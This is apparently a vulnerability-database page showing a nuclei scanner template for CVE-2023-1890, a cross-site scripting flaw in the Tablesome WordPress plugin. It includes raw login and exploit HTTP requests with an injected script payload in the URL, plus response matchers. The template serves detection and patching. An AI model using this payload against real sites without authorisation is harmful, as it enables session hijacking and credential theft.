Lucene search
K

Tablesome < 1.0.9 - Cross-Site Scripting

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Tablesome < 1.0.9 - Cross-Site Scripting vulnerability - allows injection of arbitrary script, potentially leading to session hijacking, defacement, or theft of sensitive information. Fixed in version 1.0.9

Related
Refs
Code
id: CVE-2023-1890

info:
  name: Tablesome < 1.0.9 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 1.0.9.
  reference:
    - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d
    - https://wordpress.org/plugins/tablesome/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1890
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1890
    cwe-id: CWE-79
    epss-score: 0.01067
    epss-percentile: 0.60658
    cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: pauple
    product: tablesome
    framework: wordpress
  tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<script>alert`document_domain`</script>")'
          - 'contains(body_2, "tablesome")'
        condition: and
# digest: 4a0a0047304502205ed186d7f52a359fd331740520bad33dbedcc428887c7bf821f1e840c85c1038022100ba6893a7798a37c58953a1d8885b6b65c0dd2b12abeeb34d69c1427cdffe85b2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.01067
SSVC
23